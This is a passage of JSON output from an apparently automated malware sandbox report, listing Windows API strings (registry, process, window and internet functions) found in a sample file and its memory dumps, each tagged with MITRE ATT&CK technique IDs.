00000000-00005204.00000000.334618.0040C000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegDeleteKeyA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"lstrlenA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"WinExec\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"OpenFile\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SetSystemTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"CreateEventA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"Sleep\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetParent\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"FindWindowA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"IsWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetKeyState\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SendMessageA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"FindWindowExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"SetTimer\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"LoadIconA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"InternetTimeToSystemTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"DeleteUrlCacheEntry\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"htonl\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"WSACleanup\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"WSAStartup\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"gethostbyname\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"htons\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"closesocket\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"EnumProcessModules\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"EnumProcesses\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"Process32First\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"AnimateWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetSystemTime\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileTime\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenFile\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"WinExec\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadIconA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetTimer\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SendMessageA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetKeyState\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnableWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetParent\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindWindowA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindWindowExA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetWindowPos\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteKeyA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetConnectA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetTimeToSystemTime\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteUrlCacheEntry\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumProcesses\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetSystemTime\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"4958536405,2092,3139,,CreateProcessA,kernel32.dll,\"253:12:29.882\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00000892.00000000.334478.00300000.00000004.mdmp\")\n Found reference to API \"ElevateCreateProcess\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"OpenProcess\" (Indicator: \"OpenProcess\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-208", "type": 2, "relevance": 1, "name": "Contains ability to show a graphical window (API string)", "description": "Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"ShowWindow\" (Indicator: \"ShowWindow\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"GetWindowThreadProcessId\" (Indicator: \"GetWindowThreadProcessId\"; Source: 